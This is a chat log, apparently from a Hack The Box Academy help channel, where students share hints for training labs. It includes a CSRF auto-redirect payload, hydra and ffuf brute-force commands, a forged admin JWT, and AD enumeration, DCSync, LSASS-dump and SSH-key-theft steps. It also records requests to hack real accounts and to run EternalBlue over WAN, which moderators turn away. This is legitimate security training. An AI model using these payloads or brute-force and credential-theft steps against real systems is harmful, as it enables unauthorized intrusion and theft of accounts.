Thanks, this worked. It returned the members of the domain admin group. I'm guessing I can run this command as pretty much any domain user?
Also, how do I check the groups the user I'm currently logged in as belongs to?
whoami /groups
Can any user run this command?
try and see
I'm assuming yes since the user I'm logged in as, htb-student, is not a domain admin.
Yeah, I got it shows all domain admins members, was just wondering if a regular domain user can run the command
net group "Domain Admins" /domain
by default sure
Okay, so unless restricted, then yes. Thanks
sleep time for me 💤
Goodnight 😴
domain just restricts the ldap query to domain, you can also use localgroup and stuff like that to get information about local users and groups
Noted. Thanks!
idk how right i am about it using ldap queries. Might be wrong there, but essentially the /domain looks for users and groups in the domain account rather than the local account. I had issues before where the /domain flag was the only thing i was missing to find my next step
so actually a small thing like that can be quite important
The only thing you were missing was /domain? But if you just run net group by itself then nothing shows.
try doing net group /domain
It lists all domain groups on the domain controller.
yeah
Ahh you meant you were tryna list domain groups and you couldn't.
Thanks for sharing.
for that
Apparently NET GROUP /DOMAIN will list/search perform operations on domain groups with GLOBAL scope.
NET LOCALGROUP /DOMAIN does this only for domain groups of DOMAIN LOCAL scope.
more like i was trying to see what groups a user account was a member of, but i couldn't find the user, and i forgot it was a domain user and i forgot the /domain
hi where's the channel for me getting help about metasploit payloads?
is it a part of an academy module or ?
nope
just metasploit payloads in general
do you know any community that talks about it?
👋
Doing "Misc CSRF Exploitation", the exploit works locally but when i deliver I'm not getting promoted
||```html
<!DOCTYPE html>
<html>
<body>
<script>
document.location = "http:///vulnerablesite.htb:49579/admin.php?user=htb-stdnt%26promote=htb-stdnt";
</script>
</body>
</html>
```||
It mentions in the module when sending the exploit to the admin you need to remove the port.
i have been using the port in previous sections
Try it out without it
it was the slash i got it now
Awesome
tysm i cant believe im blind enough to miss it
Has anyone done the skill assessment for the new Attacking Authentication Mechanisms?
So far I have created my own keys, used the python script provided earlier in the course with an edited payload, but it doesn't work.
this is what I have ||jwt_payload = {'user': 'htb-stdnt', 'accountType': 'admin', 'id':1234, 'iat':1718780382}||
I also tried different types of attacks from the course, bit unsure what direction is the right one lol
hmm running out of ideas, i also tried jwt tools
academy target spawning problem?
Attacking SAM in passwords attacks not spawning for me
Hey guys, I can't open resources from DOCUMENTATION & REPORTING, could you help me?
Hello Everyone , please if anyone finished Unconstrained Delegation - Computers dm me
just ask your question bud
waiting for machine to spawn
htb server becoming buggier day by day
im doing the service authentication brute forcing (login brute forcing/basic toolset)
i follow the steps from the previous module (personalized wordlists)
generate both passwords and users
and i execute the sed scripts for the generated password txt file (william.txt)
i try to brute force but im not getting anything
i tried both hydra -l b.gates -P williams.txt -u -f ssh://<IP given> -t 4
and hydra -L bill.txt -P williams.txt -u -f ssh://<IP given> -t 4
bill.txt being the user list
not sure what im doing wrong
```shell
sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt # remove no special chars
sed -ri '/[0-9]+/!d' william.txt # remove no numbers
```
can anyone help me on this
using top-usernames-shortlist didn't give the answer
seclist's top 10 million usernames wordlist is running forever
tried the username from the gitlab repo commit history, didn't work
Perhaps mention which module and section, just posting a screenshot and asking for help is just lazy
module Attacking common application
section attacking gitlab
I haven't done that module yet, sorry 🙂
got it, had to use wordlist provided in pwnbox
On 'Using CrackMapExec' - 'Basic SMB Reconnaissance' final question "What's the OS version?". Can anybody who's done this give some hint of what structure they want? I got the OS version from running cme but can't get it to accept my answer
try the whole string?
I tried the whole string "Windows 10 / xxxxxx xxxx xxxxx xxxxx xxx", did not work
Huh, tried without the /, still incorrect
Got it. Turns out using cme on my own kali vm spits out slightly different output. Tried the pwnbox and got the right format
i am stuck on this question " + 5 Compromise the Domain and read the content of \DC01\C$\Unconstrained\flag.txt " , i already got the DC ticket , and i am able to make a dcsync attack , but i can't find any privileged user , i checked all of the 19 available users, no one is in the Domain Admins group
did you try the administrator user
hi guys, has anyone completed the skill assessment for attacking authentication mechanisms? i'm starting to feel like its bugged... lol
if you are able to perform DCSync you will get the hash of administrator
i did it thank you
It's not. Try smarter.
hmm does my payload look correct? || {
"user": "htb-stdnt",
"accountType": "admin",
"id": 1234,
"iat": 1718795303
}||
If it does not get you the flag then you know it's not correct
I'm on the AD Enumeration & Attacks module. What do they mean by nested group membership? Reference
a group inside a group inside a group
Groupception
@next bronze which vpn u use
I'd recommend first doing the AD enum & attacks module if you haven't, that will give you the basics for the kerberos module
huh?
🕶️
Is my message being deleted for some reason? 😅
please limit screenshots of text contents of modules that are above tier 0
sure did
Oh, alrighty, sorry.
is that not just a random example
either way there's not really a recursive search, it will just show you the first degree groups, this is where bloodhound comes in
So if we had user joe inside the "IT execs" group, which was inside another group "IT dept", which was inside the "Domain Admins" group, then he wouldn't show under a basic enumeration of domain admins, we'd have to perform a recursive enumeration to show privileged users?
My example was random, but the screenshot was from the module, and the two were in a message, so it got deleted.
So Windapsearch's -PU option isn't recursive?
-PU, --privileged-users
Enumerate All privileged AD Users. Performs recursive
lookups for nested members.
So... it is recursive?
What did you mean by this then?
yes but only for --privileged-users
Gotcha
@next bronze do you mind if I ask what tool you use for note-taking (like for you cheatsheet when you learn from modules I mean). Is it Obsidian for this as well?
can someone tell me how to gain permission to send messages in channels T_T
yeah I use obsidian for everything, expect for the final report
aight thanks
Mind if I ask what structure you use? Do you sort your notes by technique/methodology or what? I'm worried my current method/structure may not be scalable and I'm looking to hear from people who've completed the path and the structure they use to organize their notes, basically people who've done a lot of modules and studied a bunch.
I have folders for each OS/web/services then branch into the specific techniques etc
So active directory has its own folder?
but that doesn't matter as much, I use a plugin which lets me search through my entire vault and get what I need in a few seconds
How would you organize say, for example, commands from tools like crackmapexec and smbmap, there are some commands that overlap in the Active directory portion and the SMB service portion. Do you just repeat the command or link it in some sort of way?
Let's take a simple example, maybe you wanna enumerate shares, you find yourself doing it as part of your AD methodology and your SMB enumeration, the command is basically the same.
big tools like nxc/impacket/powerview get their own notes, then they get cross linked if a technique/attack uses them. but I find that takes too much time and is nowhere near as effective as just headings search
I just headings search smb tbh, it will bring me to the sections relevant to smb
So if you're reading your method, you just mention what heading to search for and then look for that?
Btw how do you access your notes, for example, if you're at work? How do you host/sync it?
this
I have obsidian sync
Alrighty, thanks for sharing.
Can someone help me with file uploads skill assessment, I've tried so many things. If anyone has completed it please do lemme know of any tips or suggestions
got it
Hi, i am on a gold annual subscription and have a question. the modules i complete on the academy, for example the 28 modules for CPTS, when my subscription ends, will i still have access to the completed modules or will the whole modules be locked again ?
btw your comment for the second sed instruction is wrong; it's removing all words from the list that don't have special characters, same with the third one, -- remove all that don't have numbers
if you 100% completed the module, you retain access
thats what the module gave
either way
i deleted those txt files and repeated it again from the beginning
and i got it
Hi all, I'm stuck on broken authentication via parameter modifications exercise. I've tried ffuf, intruder using custom number lists. I think there may be an issue with my ffuf syntax. Can I have some assistance?
Post your syntax here 🙂
Send syntax
ffuf -w ./id.txt -u http://94.237.54.176:37750/admin.php -X GET -H "Content-Type: text/html; charset=UTF-8" -b "PHPSESSID=rs1l95p4uki48gk59ou027024v" -d "user_id=FUZZ" -fr "Could not load admin data. Please check your privileges."
Put :FUZZ after word list
that won't make much different since there is only one
Not necessary with only one list
Ooo didn't know that, thought u need to identify it with smtg
Only with multiple lists
Is -X for post?
The method should be post though yeah
Drop the -X GET -H ... and look closely to the content
and make sure that the IP is still up
Okay, trying those
It's a get request so it needs to be part of the url
I just tried it with correct command and it should work
I just killed my exercise by opening this haha😆
let us know how it went 😄
Gains in knowledge and muscle 
yeah
doing MODERN WEB EXPLOITATION TECHNIQUES - Second order - IDOR (whitebox)
it worth the price ?
nice
Got it! Thanks all
good job!!
We aren't hacking anything for you, or recovering accounts. Reach out to the relevant support for the product you're locked out of
😭
Aaa shit then i just want to stop pedophile i just want to be bat man
Contact police
I did and they didn't answer me
Cool cool thanks anyway
Only if it's legal.
bro thinks hes Ryan Montgomery
Still follow #rules
agreed
how did you get over here if you've not read the #rules
I just want stop them because 30-75 years old pedophile on klepetalnica123 eh guys have a good one bye
Same reason I keep asking myself how people can be stupid enough to ask questions about their exam while it clearly states to not do it and doing so might result in termination of your exam 😄
😅 😂
is it normal in Firewall and IDS/IPS Evasion - Easy Lab i got like 50 alerts without even scanning once?
Yeah. That happens sometimes
ill just reset the machine.. lol
It's 100 to trigger the ids I think
And most stuff won't trigger more than a couple alerts
yeah... i want to trigger as few as possible!
trying out parameter combos! its fun
Try that on the hard lab instead of easy
well, i have to go through easy first..
Well get through them all first before worrying about optimization
on Skill Assessment - Website
"Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside? "
i have this admin login page
/admin_login.php
i execute
hydra -l user -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 83.136.253.89 -s 52898 http-post-form "/admin_login.php:username=^USER^%password=^PASS^:F=<form name='login'"
got a password but its wrong
right.. get the flags for now... good idea!
Are those thr right parameters for the log in form?
Also you're jumping all over the place, are you doing the cpts path? Or just doing as you want
ye its <ip given>/admin_login.php
oh no im still in the same path
log in brute forcing
basic toolset
Ah ok
i successfully brute forced the first log in page
user:password
using the ftp-betterdefaultpasslist.txt
Is the username and password parameters correct as well as the fail string
then used it on the /admin_login.php page
it gave me root:root
was wrong and on the question, its hint was that i have to use the previous user
which was user
uhh i did this
Check page source
What parameters are getting passed for username and password
Reread the section regarding determining login parameters
ye give me a sec
alr uhh on the page source im not sure where to look at
ye i got lost a bit
Form name
How can I exploit windows 7 eternal blue over wan I have a router
Take it slow, repeat the steps from that section
spoiler dont check || <form name='log-in' autocomplete='off' class='form' action='' method='post'> ||
#homelab-sysadm read and follow #welcome to access
Well there's why you got the false positive
why
Check your fail string
OH
@fathom pendant out of curiosity, are you working for htb lol
log-in not login
No
wow then i do really appreciate for your service and commitment
yes
I enjoy hanging out and losing braincells
why losing
Truly a mystery
only winning
htb should hire you for real
Anyway the determining parameters section tells you how to determine the username and password variables that get passed to the backend
not a spoiler anymore
might take a while because of the list
imma use the shorter ones
I would use a more common list
hm lemme check on Common-Credentials
Also your parameters are still incorrect
"/login.php:[user parameter]=^USER^&[password parameter]=^PASS^:F=<form name='login'" is the base form
Fail string != parameter
oh those are parameters
Yes
Parameters are what gets passed through
The fail string is just what hydra checks
You can either use page source or send a test test username/password to intercept/use browser tools to catch
ye
found it
Spoiler you goon
oh shit
Also spoiler
And...
Anyway
ye ill change em in a bit
Once you break in, the info on page is actually useful for the next assessment
i need to find the correct list though
oh alright ill keep that in mind
Common should work
Ah also rockyou should work as well
It shouldn't take that long
Don't forget to use more threads
alright
oh btw this
when and why do i use this
i wanna take a note of it
It's the basic http post format
alright alright
imma note it as that
You need to adjust to each situation
so like whenever there is a brute force attack on an http - /login.php
page we use that?
On a post login yes
Well hydra uses it idk what other tools syntax are as they aren't covered
hm alright
alright next module
wait how do i gain info on him
OSINT?lmao
i only know his full name
imma just use what i have
oh shit
in Firewall and IDS/IPS Evasion - Medium Lab, i found the answer. however, it seems to me that|| the answer is not a "DNS server version"..its a flag!||. Is this intended?
ye
doesnt it mention flags on your task?
https://academy.hackthebox.com/module/110/section/1086 Having a bit of trouble finding the flag.txt, I've run spider and AJAX and active scan, found the high vuln but do not see a directory with flag.txt. Anyone available to help?
Try clearing cookies or a different server
it was malwarebytes extension on my chrome
Oooh
Yo guys! I'm currently doing the 'setting up' module in Information Security Foundations. There are a lot of terms which I don't understand. External, internal pentest. VPS, some linux stuff and etc.. Should I research it all while reading or is this just an example and I'm gonna see all the definitions in other modules?
Research it
Hi guys, i have a small issue with practical exercises. If i start PWNBOX and initiate the target, i do not have connection between them. Do you have some advice for me? Thanks
What module, what section and what exactly are you trying?
Module: WINDOWS FUNDAMENTALS, each practical section with tasks. I start pwnbox and the target, but I don't have ping to the target. I am trying it for the third day in a row. I only have one attempt per day.
Hello, I'm on the "Attacking Enterprise Networks" Module and on the "Web Enumeration & Exploitation" section.
I'm trying to replicate the steps presented for ||the dev.inlanefreight.local VHOST, by adding the header found previously
but instead of retrieving the web page as seen on the module I get 408 Request Timeout Response.||
I have already tried to reset the environment multiple times but I always get the same result.
Has anyone encountered this problem ?
did you try to just connect via rdp instead of pinging?
Oh, it works. Thanks 😉
1 attempt only?
With pwnbox, but I am working now in VMware.
daam u really took 3 min to type that
has anyone been able to do the Optional exercises in the Password Attacks module ?
they give you access to LINUX1, but you are supposed to start proxychains on MSO1 and I cannot seem to be able to connect to that machine from either LINUX1 or the attack box
ah nvm I got it, but I will prob have to start building network topologies from now xD
im having some trouble on the web attacks skills assessment. If anyones around and could DM me to nudge me in the right direction, it would be greatly appreciated.
Hi, I am going over the HTB Academy tasks, A question: Why is the VPN connection for the target server often lost, or the target server not responding?
Eg. the Session Hijacking of XSS
I also tried from the Pwnbox but it did not bear any fruits.
sometimes these network problems are ok but it happens so regularly nowadays that 3 hr of work takes 6+ hr
For some module, the network issues makes following the tasks mission impossible
true true
Can I have a nudge on broken auth skills assessment? I'm not sure where to go with this 2FA OTP
hey I'm doing Footprinting module of CPTS path and I'm stuck at DNS
The last question of this section is:
Q)What is the FQDN of the host where the last octet ends with "x.x.x.203"?
Ans)
dnsenum --dnsserver 10.129.104.176 --enum -p 0 -s 0 -o <output file name> -f <path of password list> --threads 90 dev.inlanefreight.htb
but I'm very confused how to get "dev" subdomain
anybody ?
@blissful verge ?
Try to run it with a different wordlist (like one from seclists)
is there a pinned document to look at for getting started?
for when you don't know what you don't know but don't want to ask chat gpt right away?
like I m not getting on which domain I have to use different wordlists
Idk which i did but try the dev subdomain and then the root
It's frustrating
It's a seclists wordlists that i know
Subdomains of subdomains
You get the initial subdomain via a proper enum
If you do a regular dig axfr you'll get a list, then there's a fierce wordlist you use against it
Research
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
thank you! gonna do some studying with web resources, ttyl!
hi there
in the Password Attacks Credential Hunting in Linux
is it possible to land on the box without the info from the hint? I find it kinda frustrating that you actually need to use the hint
Lots of time bruteforcing and waiting for the user list and wordlist to line up
Iirc the first box (sam) is linux so you can check /home/
The windows labs and linux labs in this module are all interconnected
So it can save some time to check C:/Users and /home/ to make a shorter list
The only ones not connected are the skill assessment labs
Hello I have a question
If a box is recommended in module 10 does that mean that it is recommended based off the assumption that you did all 10 modules or just the single module # 10
the thing is that the hint itself is wrong
the username is unnecessarily mutated
so you can literally fall in a rabbit hole cuz u used the hint
? The password is mutated not the username
Also they give you a Name, not username
The name can be lowercased since linux
Module 10? Bro just say the module name, but no
Also module recommendation just means that the retired boxes suggested have what you just learned in some form. But it doesn't mean you can just pwn it with no effort
For instance, footprinting links to all retired boxes since footprinting is the first step
yeah sure but still kinda frustrating 🙂
Okay thanks
Im gonna do the recommended boxes in the CBBH before doing the exam
I think it will take me at least 2 months ?
I wouldn't recommend that tbh
The goal of boxes and the goal of web app testing don't really align
I suggest just reviewing the modules, and going to portswigger for what you still don't understand
Okay. BTw did you attempt the CBBH?
No
So how do u know what is good preparation
Because other people have said what's good prep
And again the goal of a box is to root it
That's not the goal of the exam
But I thought the CBBH exam was a set of web apps that you have to root & find all the vulnerabilities for
does it say that anywhere?
But anyway, cbbh is about doing bug bounty activities
And rooting machines is not a bb activity
This is the info available:
The candidate will have to perform bug bounty hunting activities against multiple real-world applications hosted in HTB’s infrastructure and accessible via VPN (using Pwnbox or their own local VM). Upon starting the examination process, a letter of engagement will be provided that will clearly state all engagement details, requirements, objectives, and scope. All a candidate needs to perform the required bug bounty hunting activities is a stable internet connection and VPN software. HTB Certified Bug Bounty Hunter certification is the most practical certification for Bug Bounty Hunters that focuses on both bug hunting and professionally communicating findings.
So:
The candidate will have to perform bug bounty hunting activities against multiple real-world applications hosted in HTB’s infrastructure and accessible via VPN
Means what I said which is to attack a set of web apps.
You said "to root" you don't have to root a web app to find a vulnerability
Marcielee is talking about the privilege escalation part, once you get a RCE as bug bounty hunter you're done. I indeed just noticed that there are no privesc modules in the CBBH path
Anyone got a good guide or video on how to crack the ntds.dit file for the skills assessment for Cracking Passwords with Hashcat?
The password attacks module has an NTDS.dit section
In previous projects, I have been tasked with auditing Active Directory passwords as well as compromising an Active Directory Domain…
You need to extract the hashes first
anyone for a nudge on the 2nd question of the DACL attacks II skills assessment?
I've found the attack path but am missing one part of it
fun part is I have to first RDP to Linux and from there I had to RDP to Windows with this network
May I know the correct answer for the question below? I entered the IP address of discovered hosts (e.g. 172.16.1.15) or the number of discovered hosts (e.g. 2), but it is not showing as correct.... The question is so vague.... I wonder who created this question...
Module name: Intro to C2 Operations with Sliver
Module: https://academy.hackthebox.com/module/241/section/2693
Question: Enter the numerical value of the machines that can be accessed via the Administrator's hash
I think the intended path is to spray with cme and see what you can access
unfortunately, for me, nxc doesn't handle 0/24 CIDR ranges well
crackmapexec gave me the right answer though
iirc
Already did and found ips. But submitting discovered host will not be correct answer. So I wonder what is the question about
hmm strange... I don't remember exactly what I did tbh
I think it is implying RCE
manually enumerate scriptPath
ah can I msg you with a question 🙂 ?
sure
Hi HTB'ers, totally lost on Pivoting, Tunneling, and Port Forwarding module Skills Assessment. I'm 5 hours in, stepping back to breathe and ask for help.
steps up to this point:
1- access webshell on pivot machine
1.1- got mlefay and webadmin credentials
2- for loop, found machine 172.16.5.35
3- msfvenom > create reverse shell payload
3.1- uploaded to webshell machine && execute
3.2- setup autoroute on msfconsole
3.3- redirect route from 172.16.5.35 to localport:3700
3.4- configure proxychains
4- xfreerdp to 172.16.5.35 using proxychains
4.1- LSASS dump, got vfrank credential
4.2- stuck here
(Only missing to find the 2 last questions)
there is another machine
iirc
@rustic sage since there's too many cooks in the kitchen, i'm going to help you here
since the other people don't know wtf they're talking about to have you move forward
and are honestly just adding unneeded stress
yep
so where would the person hide his ssh keys
yep
what folder/directory would house root's files
root being root user?
yes
do you not need to be on the root user to access them?
well maybe you can at least look
cd /
again we're ignoring for a moment that you're not root
there is .ssh
yes now cd there
yup
now, this next part requires understanding file permissions
okay
okay
since all these files belong to root owner/group, there's one that has read permissions for all others
ok im there
ok
now do ls -la
and keep in mind the basics
r- read
w-write
x-execute
and to copy/paste in terminal, you need to do ctrl+shift+c
and ctrl+shift+v to paste
so do I need authorized keys
nope
id_rsa.pub
and i use vim to access it
what does chmod do
change mode
it changes the file permissions
most people use the octal system
r = 4
w = 2
x = 1
so a r--|r--|r-- would be 444
well you need to copy the private key to your system to use it
and by default the file will be too open, so yes
but you can't use it
ssh does not like id_rsa files that have permissions that are too open
why does it have to be r-r-r
aka anyone but the owner can read
it doesn't have to be; i was giving in example
in reality 400 or 600 will work
👋